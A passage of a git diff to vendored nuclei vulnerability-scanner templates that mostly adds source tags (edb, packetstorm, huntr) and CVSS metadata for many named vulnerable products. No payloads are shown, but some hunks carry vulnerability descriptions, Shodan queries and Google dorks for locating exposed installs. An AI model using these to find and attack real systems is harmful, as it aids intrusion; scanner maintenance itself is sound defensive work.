b/config/nuclei-templates/vulnerabilities/other/geovision-geowebserver-xss.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: geowebserver,xss + tags: geowebserver,xss,packetstorm requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/gsoap-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/gsoap-lfi.yaml index e1d7719f7..446ea053c 100644 --- a/config/nuclei-templates/vulnerabilities/other/gsoap-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/gsoap-lfi.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: gsoap,lfi + tags: edb,gsoap,lfi requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/hashicorp-consul-rce.yaml b/config/nuclei-templates/vulnerabilities/other/hashicorp-consul-rce.yaml index 9ccbfea3f..52a8e97f0 100644 --- a/config/nuclei-templates/vulnerabilities/other/hashicorp-consul-rce.yaml +++ b/config/nuclei-templates/vulnerabilities/other/hashicorp-consul-rce.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 - tags: hashicorp,rce,oast,intrusive + tags: hashicorp,rce,oast,intrusive,edb requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/hasura-graphql-psql-exec.yaml b/config/nuclei-templates/vulnerabilities/other/hasura-graphql-psql-exec.yaml index 0a2cd9785..5c3fbecd7 100644 --- a/config/nuclei-templates/vulnerabilities/other/hasura-graphql-psql-exec.yaml +++ b/config/nuclei-templates/vulnerabilities/other/hasura-graphql-psql-exec.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 - tags: hasura,rce,graphql + tags: graphql,edb,hasura,rce requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml index d335ea1fc..e534753ac 100644 --- a/config/nuclei-templates/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: hrsale,lfi + tags: hrsale,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/huawei-router-auth-bypass.yaml b/config/nuclei-templates/vulnerabilities/other/huawei-router-auth-bypass.yaml index bde5f950f..5368998b1 100644 --- a/config/nuclei-templates/vulnerabilities/other/huawei-router-auth-bypass.yaml +++ b/config/nuclei-templates/vulnerabilities/other/huawei-router-auth-bypass.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-288 - tags: huawei,auth-bypass,router + tags: auth-bypass,router,edb,huawei requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/joomla-com-fabrik-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/joomla-com-fabrik-lfi.yaml index c6919b722..fe23caac3 100644 --- a/config/nuclei-templates/vulnerabilities/other/joomla-com-fabrik-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/joomla-com-fabrik-lfi.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: joomla,lfi + tags: joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/kavita-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/kavita-lfi.yaml index ad2fca690..6bc32e8cf 100644 --- a/config/nuclei-templates/vulnerabilities/other/kavita-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/kavita-lfi.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true shodan-query: http.html:"kavita" - tags: kavita,lfi + tags: kavita,lfi,huntr requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/kevinlab-bems-sqli.yaml b/config/nuclei-templates/vulnerabilities/other/kevinlab-bems-sqli.yaml index 929f8c97c..40f1c00ab 100644 --- a/config/nuclei-templates/vulnerabilities/other/kevinlab-bems-sqli.yaml +++ b/config/nuclei-templates/vulnerabilities/other/kevinlab-bems-sqli.yaml @@ -10,7 +10,7 @@ info: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php - https://www.exploit-db.com/exploits/50146 - https://packetstormsecurity.com/files/163572/ - tags: kevinlab,sqli + tags: kevinlab,sqli,edb,packetstorm requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/kyocera-m2035dn-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/kyocera-m2035dn-lfi.yaml index acc5552d8..596f2dc86 100644 --- a/config/nuclei-templates/vulnerabilities/other/kyocera-m2035dn-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/kyocera-m2035dn-lfi.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: printer,iot,kyocera,lfi + tags: edb,printer,iot,kyocera,lfi requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/laravel-filemanager-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/laravel-filemanager-lfi.yaml index d4028dff2..bebba5de5 100644 --- a/config/nuclei-templates/vulnerabilities/other/laravel-filemanager-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/laravel-filemanager-lfi.yaml @@ -11,7 +11,7 @@ info: metadata: google-dork: inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io shodan-query: http.html:"Laravel FileManager" - tags: lfi,unisharp,laravel,filemanager,fileupload,lfr + tags: lfr,edb,lfi,unisharp,laravel,filemanager,fileupload requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/loancms-sqli.yaml b/config/nuclei-templates/vulnerabilities/other/loancms-sqli.yaml index dd5dd0a20..b96bac34c 100644 --- a/config/nuclei-templates/vulnerabilities/other/loancms-sqli.yaml +++ b/config/nuclei-templates/vulnerabilities/other/loancms-sqli.yaml @@ -10,7 +10,7 @@ info: - https://www.exploit-db.com/exploits/50402 metadata: verified: true - tags: loancms,sqli,auth-bypass,cms + tags: edb,loancms,sqli,auth-bypass,cms requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml b/config/nuclei-templates/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml index 6993c365f..720ae3f77 100644 --- a/config/nuclei-templates/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml +++ b/config/nuclei-templates/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml @@ -7,7 +7,7 @@ info: description: A vulnerability in Luftguitar CMS allows remote unauthenticated users to upload files to the remote service via the 'ftb.imagegallery.aspx' endpoint. reference: - https://www.exploit-db.com/exploits/14991 - tags: luftguitar + tags: luftguitar,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/minimouse-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/minimouse-lfi.yaml index 58d0b6264..d87d85464 100644 --- a/config/nuclei-templates/vulnerabilities/other/minimouse-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/minimouse-lfi.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: minimouse,lfi + tags: lfi,edb,minimouse requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/netgear-router-exposure.yaml b/config/nuclei-templates/vulnerabilities/other/netgear-router-exposure.yaml index 71f191158..4b69bfe16 100644 --- a/config/nuclei-templates/vulnerabilities/other/netgear-router-exposure.yaml +++ b/config/nuclei-templates/vulnerabilities/other/netgear-router-exposure.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: netgear,exposure,iot,router + tags: edb,netgear,exposure,iot,router requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/netis-info-leak.yaml b/config/nuclei-templates/vulnerabilities/other/netis-info-leak.yaml index dfe9ded8c..843fffc6d 100644 --- a/config/nuclei-templates/vulnerabilities/other/netis-info-leak.yaml +++ b/config/nuclei-templates/vulnerabilities/other/netis-info-leak.yaml @@ -7,7 +7,7 @@ info: description: A vulnerability in Netis allows remote unauthenticated users to disclose the WiFi password of the remote device. reference: - https://www.exploit-db.com/exploits/48384 - tags: netis,exposure + tags: netis,exposure,edb requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/nuuo-file-inclusion.yaml b/config/nuclei-templates/vulnerabilities/other/nuuo-file-inclusion.yaml index 1812b6d77..6d7ed08d0 100644 --- a/config/nuclei-templates/vulnerabilities/other/nuuo-file-inclusion.yaml +++ b/config/nuclei-templates/vulnerabilities/other/nuuo-file-inclusion.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: nuuo,lfi + tags: lfi,edb,nuuo requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/nuuo-nvrmini2-rce.yaml b/config/nuclei-templates/vulnerabilities/other/nuuo-nvrmini2-rce.yaml index 6be0b8dc6..e0f40d506 100644 --- a/config/nuclei-templates/vulnerabilities/other/nuuo-nvrmini2-rce.yaml +++ b/config/nuclei-templates/vulnerabilities/other/nuuo-nvrmini2-rce.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 - tags: rce,nuuo,nvrmini + tags: rce,nuuo,nvrmini,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/oliver-library-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/oliver-library-lfi.yaml index 9cbd5f00a..84bd572c1 100644 --- a/config/nuclei-templates/vulnerabilities/other/oliver-library-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/oliver-library-lfi.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: windows,lfi,oliver + tags: lfi,oliver,edb,windows requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/omnia-mpx-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/omnia-mpx-lfi.yaml index 63007d4eb..99b9dd2b1 100644 --- a/config/nuclei-templates/vulnerabilities/other/omnia-mpx-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/omnia-mpx-lfi.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true shodan-query: http.html:"Omnia MPX" - tags: lfi,omnia,mpx,traversal + tags: mpx,traversal,edb,lfi,omnia requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/onlinefarm-management-xss.yaml b/config/nuclei-templates/vulnerabilities/other/onlinefarm-management-xss.yaml index 6bca5be9e..6fb3c4ce2 100644 --- a/config/nuclei-templates/vulnerabilities/other/onlinefarm-management-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/other/onlinefarm-management-xss.yaml @@ -10,7 +10,7 @@ info: - https://www.exploit-db.com/exploits/48673 metadata: verified: true - tags: onlinefarm,cms,xss + tags: onlinefarm,cms,xss,edb requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/opennms-log4j-jndi-rce.yaml b/config/nuclei-templates/vulnerabilities/other/opennms-log4j-jndi-rce.yaml index 0f737546f..1a5fa028d 100644 --- a/config/nuclei-templates/vulnerabilities/other/opennms-log4j-jndi-rce.yaml +++ b/config/nuclei-templates/vulnerabilities/other/opennms-log4j-jndi-rce.yaml @@ -13,11 +13,14 @@ info: - https://logging.apache.org/log4j/2.x/security.html - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 cve-id: CVE-2021-44228 + cwe-id: CWE-917 metadata: - verified: true shodan-query: title:"OpenNMS Web Console" - tags: jndi,log4j,rce,opennms,cve,cve2021 + verified: "true" + tags: jndi,log4j,rce,opennms,cve,cve2021,kev requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/opensis-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/opensis-lfi.yaml index 3197938b2..528059b02 100644 --- a/config/nuclei-templates/vulnerabilities/other/opensis-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/opensis-lfi.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: opensis,lfi + tags: opensis,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml b/config/nuclei-templates/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml index a1a850487..5e30e7db5 100644 --- a/config/nuclei-templates/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml +++ b/config/nuclei-templates/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 - tags: optiLink,rce,oast,mirai + tags: optiLink,rce,oast,mirai,packetstorm requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/oracle-fatwire-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/oracle-fatwire-lfi.yaml index 4018d370b..d48996de9 100644 --- a/config/nuclei-templates/vulnerabilities/other/oracle-fatwire-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/oracle-fatwire-lfi.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - tags: lfi,oracle,fatwire + tags: lfi,oracle,fatwire,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml index f19e1846d..a42f1563c 100644 --- a/config/nuclei-templates/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: bscw,orbiteam,lfi,unauth + tags: bscw,orbiteam,lfi,unauth,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/otobo-open-redirect.yaml b/config/nuclei-templates/vulnerabilities/other/otobo-open-redirect.yaml index 07698281a..905cf5afd 100644 --- a/config/nuclei-templates/vulnerabilities/other/otobo-open-redirect.yaml +++ b/config/nuclei-templates/vulnerabilities/other/otobo-open-redirect.yaml @@ -8,7 +8,7 @@ info: reference: - https://huntr.dev/bounties/de64ac71-9d06-47cb-b643-891db02f2a1f/ - /~https://github.com/rotheross/otobo - tags: redirect,otobo + tags: redirect,otobo,huntr requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/parallels-hsphere-xss.yaml b/config/nuclei-templates/vulnerabilities/other/parallels-hsphere-xss.yaml index 73f5f1bea..5f2c2281b 100644 --- a/config/nuclei-templates/vulnerabilities/other/parallels-hsphere-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/other/parallels-hsphere-xss.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true shodan-query: title:"h-sphere" - tags: parallels,hsphere,xss + tags: hsphere,xss,edb,parallels requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/php-timeclock-xss.yaml b/config/nuclei-templates/vulnerabilities/other/php-timeclock-xss.yaml index 4da922add..693a776d5 100644 --- a/config/nuclei-templates/vulnerabilities/other/php-timeclock-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/other/php-timeclock-xss.yaml @@ -7,7 +7,7 @@ info: description: PHP Timeclock version 1.04 (and prior) Cross-Site Scripting vulnerabilities reference: - https://www.exploit-db.com/exploits/49853 - tags: xss,php,timeclock + tags: xss,php,timeclock,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/phpwiki-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/phpwiki-lfi.yaml index ba4b6fc48..3e86d81da 100644 --- a/config/nuclei-templates/vulnerabilities/other/phpwiki-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/phpwiki-lfi.yaml @@ -7,7 +7,7 @@ info: description: phpwiki 1.5.4 is vulnerable to cross-site scripting and local file inclusion, and allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint. reference: - https://www.exploit-db.com/exploits/38027 - tags: phpwiki,lfi,xss + tags: xss,edb,phpwiki,lfi requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/pmb-directory-traversal.yaml b/config/nuclei-templates/vulnerabilities/other/pmb-directory-traversal.yaml index 089982cb2..44806eb19 100644 --- a/config/nuclei-templates/vulnerabilities/other/pmb-directory-traversal.yaml +++ b/config/nuclei-templates/vulnerabilities/other/pmb-directory-traversal.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi + tags: lfi,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/pmb-local-file-disclosure.yaml b/config/nuclei-templates/vulnerabilities/other/pmb-local-file-disclosure.yaml index 350073d35..1bdcdb5cf 100644 --- a/config/nuclei-templates/vulnerabilities/other/pmb-local-file-disclosure.yaml +++ b/config/nuclei-templates/vulnerabilities/other/pmb-local-file-disclosure.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,pmb + tags: lfi,pmb,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/processmaker-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/processmaker-lfi.yaml index 070351c74..a240eb81c 100644 --- a/config/nuclei-templates/vulnerabilities/other/processmaker-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/processmaker-lfi.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: processmaker,lfi + tags: processmaker,lfi,edb requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/rconfig-rce.yaml b/config/nuclei-templates/vulnerabilities/other/rconfig-rce.yaml index a4611b31a..4ae976a76 100644 --- a/config/nuclei-templates/vulnerabilities/other/rconfig-rce.yaml +++ b/config/nuclei-templates/vulnerabilities/other/rconfig-rce.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.rconfig.com/downloads/rconfig-3.9.5.zip - https://www.exploit-db.com/exploits/48878 - tags: rconfig,rce + tags: rconfig,rce,edb requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/rockmongo-xss.yaml b/config/nuclei-templates/vulnerabilities/other/rockmongo-xss.yaml index a44e456d5..cb1d33cc5 100644 --- a/config/nuclei-templates/vulnerabilities/other/rockmongo-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/other/rockmongo-xss.yaml @@ -7,7 +7,7 @@ info: description: A vulnerability in RockMongo allows attackers to inject arbitrary javascript into the response returned by the application. reference: - https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html - tags: rockmongo,xss + tags: rockmongo,xss,packetstorm requests: - method: POST diff --git a/config/nuclei-templates/vulnerabilities/other/sar2html-rce.yaml b/config/nuclei-templates/vulnerabilities/other/sar2html-rce.yaml index 3ebfa69b6..f85b537cc 100644 --- a/config/nuclei-templates/vulnerabilities/other/sar2html-rce.yaml +++ b/config/nuclei-templates/vulnerabilities/other/sar2html-rce.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 - tags: sar2html,rce,oast + tags: sar2html,rce,oast,edb requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/seowon-router-rce.yaml b/config/nuclei-templates/vulnerabilities/other/seowon-router-rce.yaml index b89361275..a24dc1887 100644 --- a/config/nuclei-templates/vulnerabilities/other/seowon-router-rce.yaml +++ b/config/nuclei-templates/vulnerabilities/other/seowon-router-rce.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 - tags: rce,seowon,router,unauth,iot + tags: unauth,iot,edb,rce,seowon,router requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml index 04fa7863f..e731b5fe4 100644 --- a/config/nuclei-templates/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-22 metadata: google-dork: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login - tags: sofneta,lfi + tags: sofneta,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/solar-log-authbypass.yaml b/config/nuclei-templates/vulnerabilities/other/solar-log-authbypass.yaml index bc839a443..305f426d9 100644 --- a/config/nuclei-templates/vulnerabilities/other/solar-log-authbypass.yaml +++ b/config/nuclei-templates/vulnerabilities/other/solar-log-authbypass.yaml @@ -10,7 +10,7 @@ info: - https://www.exploit-db.com/exploits/49986 classification: cwe-id: CWE-284 - tags: solarlog,auth-bypass + tags: solarlog,auth-bypass,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/spark-webui-unauth.yaml b/config/nuclei-templates/vulnerabilities/other/spark-webui-unauth.yaml index 6ca1120cb..562ef064d 100644 --- a/config/nuclei-templates/vulnerabilities/other/spark-webui-unauth.yaml +++ b/config/nuclei-templates/vulnerabilities/other/spark-webui-unauth.yaml @@ -6,7 +6,7 @@ info: severity: medium reference: - /~https://github.com/vulhub/vulhub/tree/master/spark/unacc - tags: spark,unauth + tags: unauth,vulhub,spark requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/surrealtodo-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/surrealtodo-lfi.yaml index 432a09030..192c0a984 100644 --- a/config/nuclei-templates/vulnerabilities/other/surrealtodo-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/surrealtodo-lfi.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-22 metadata: verified: true - tags: surreal,lfi + tags: surreal,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/tikiwiki-json-rpc.yaml b/config/nuclei-templates/vulnerabilities/other/tikiwiki-json-rpc.yaml index 8d026c20d..798471ff8 100644 --- a/config/nuclei-templates/vulnerabilities/other/tikiwiki-json-rpc.yaml +++ b/config/nuclei-templates/vulnerabilities/other/tikiwiki-json-rpc.yaml @@ -10,7 +10,7 @@ info: - /~https://github.com/act1on3/nuclei-templates/blob/master/vulnerabilities/kiwi-information-disclosure.yaml metadata: shodan-query: title:"Kiwi TCMS - Login",http.favicon.hash:-1909533337 - tags: kiwitcms,exposure,misconfig + tags: kiwitcms,exposure,misconfig,hackerone requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/umbraco-base-ssrf.yaml b/config/nuclei-templates/vulnerabilities/other/umbraco-base-ssrf.yaml index a5c50e095..d68b7f076 100644 --- a/config/nuclei-templates/vulnerabilities/other/umbraco-base-ssrf.yaml +++ b/config/nuclei-templates/vulnerabilities/other/umbraco-base-ssrf.yaml @@ -14,7 +14,7 @@ info: metadata: verified: true shodan-query: http.html:"Umbraco" - tags: ssrf,umbraco,oast + tags: oast,edb,ssrf,umbraco requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/vanguard-post-xss.yaml b/config/nuclei-templates/vulnerabilities/other/vanguard-post-xss.yaml index aec829344..adbac4d5d 100644 --- a/config/nuclei-templates/vulnerabilities/other/vanguard-post-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/other/vanguard-post-xss.yaml @@ -7,7 +7,7 @@ info: description: Persistent Cross-site Scripting in message & product title-tags also there's Non-Persistent Cross-site scripting in product search box reference: - https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html - tags: vanguard,xss + tags: vanguard,xss,packetstorm requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/vpms-auth-bypass.yaml b/config/nuclei-templates/vulnerabilities/other/vpms-auth-bypass.yaml index 1dcb73f60..8c12e1c61 100644 --- a/config/nuclei-templates/vulnerabilities/other/vpms-auth-bypass.yaml +++ b/config/nuclei-templates/vulnerabilities/other/vpms-auth-bypass.yaml @@ -7,7 +7,7 @@ info: description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter. reference: - https://www.exploit-db.com/exploits/48877 - tags: auth-bypass + tags: auth-bypass,edb requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/watchguard-credentials-disclosure.yaml b/config/nuclei-templates/vulnerabilities/other/watchguard-credentials-disclosure.yaml index 68a2a7322..5f12961cf 100644 --- a/config/nuclei-templates/vulnerabilities/other/watchguard-credentials-disclosure.yaml +++ b/config/nuclei-templates/vulnerabilities/other/watchguard-credentials-disclosure.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-288 - tags: watchguard,disclosure + tags: watchguard,disclosure,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/webui-rce.yaml b/config/nuclei-templates/vulnerabilities/other/webui-rce.yaml index 372b5a39c..116857b0e 100644 --- a/config/nuclei-templates/vulnerabilities/other/webui-rce.yaml +++ b/config/nuclei-templates/vulnerabilities/other/webui-rce.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 - tags: webui,rce + tags: webui,rce,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/wems-manager-xss.yaml b/config/nuclei-templates/vulnerabilities/other/wems-manager-xss.yaml index 951a568d3..de8358ea1 100644 --- a/config/nuclei-templates/vulnerabilities/other/wems-manager-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/other/wems-manager-xss.yaml @@ -8,7 +8,7 @@ info: 'email' parameter. reference: - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html - tags: xss + tags: xss,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/xerox-efi-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/xerox-efi-lfi.yaml index f58802997..234388020 100644 --- a/config/nuclei-templates/vulnerabilities/other/xerox-efi-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/xerox-efi-lfi.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: iot,xerox,disclosure,lfi + tags: iot,xerox,disclosure,lfi,packetstorm,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/yeswiki-sql.yaml b/config/nuclei-templates/vulnerabilities/other/yeswiki-sql.yaml index b4f14028e..5a438d385 100644 --- a/config/nuclei-templates/vulnerabilities/other/yeswiki-sql.yaml +++ b/config/nuclei-templates/vulnerabilities/other/yeswiki-sql.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true shodan-query: http.html:"yeswiki" - tags: yeswiki,sqli + tags: yeswiki,sqli,huntr variables: num: "999999999" diff --git a/config/nuclei-templates/vulnerabilities/other/yeswiki-stored-xss.yaml b/config/nuclei-templates/vulnerabilities/other/yeswiki-stored-xss.yaml index 1676a5b4d..40b9fe654 100644 --- a/config/nuclei-templates/vulnerabilities/other/yeswiki-stored-xss.yaml +++ 